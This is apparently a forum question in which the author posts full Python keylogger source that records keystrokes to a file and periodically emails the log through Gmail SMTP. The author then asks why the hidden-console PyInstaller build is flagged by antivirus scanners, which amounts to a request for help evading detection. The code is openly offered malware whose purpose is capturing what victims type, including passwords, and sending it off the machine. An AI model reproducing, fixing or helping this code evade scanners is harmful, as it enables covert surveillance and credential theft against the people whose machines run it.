I have been experimenting with keyloggers and the ability to send a log file over email. My python program file is not detected as malicious by any file scanner. Here is the hash for VirusTotal : 846d0202bf71c7d62347b51a38c080e70a34d39d936a5bb36c3f76775f39693c
Here is the code.
from pynput.keyboard import Listener
import smtplib
import mimetypes
from email.message import EmailMessage
import time
def log_keystroke(key):
key = str(key).replace("'", "")
if key == 'Key.space':
key = ' '
if key == 'Key.shift_r':
key = ''
if key == "Key.enter":
key = '\n'
with open("log.txt", 'a') as f:
f.write(key)
with Listener(on_press=log_keystroke) as l:
l.join()
while True:
time.sleep(600)
a()
def a():
message = EmailMessage()
message['From'] = "email@gmail.com"
message['To'] = "email@gmail.com"
message['Subject'] = 'Log'
body = """Log"""
message.set_content(body)
mime_type, _ = mimetypes.guess_type('log.txt')
mime_type, mime_subtype = mime_type.split('/')
with open('log.txt', 'rb') as file:
message.add_attachment(file.read(),
maintype=mime_type,
subtype=mime_subtype,
filename='log.txt')
print(message)
mail_server = smtplib.SMTP_SSL('smtp.gmail.com')
mail_server.set_debuglevel(1)
mail_server.login("email@email.com", 'password_example')
mail_server.send_message(message)
mail_server.quit()
However , after compiling it with pyinstaller , the .exe is seen as malicious by some trackers. Note that I have given it an icon image , so that cant be the problem. Here is the hash for the compiled exe: 210c6bd1869903ebdbb693fd7b9e62db548513c0750132466a3417a59b16139e
I used pyinstaller --noconsole --onefile even with directory it is still tracked by some. I understand that keyloggers are malicious but since it wasnt tracked as a python file there should be a problem with the compiling?If anyone knows about this or has encountered this before , please let me know. Thanks 0x
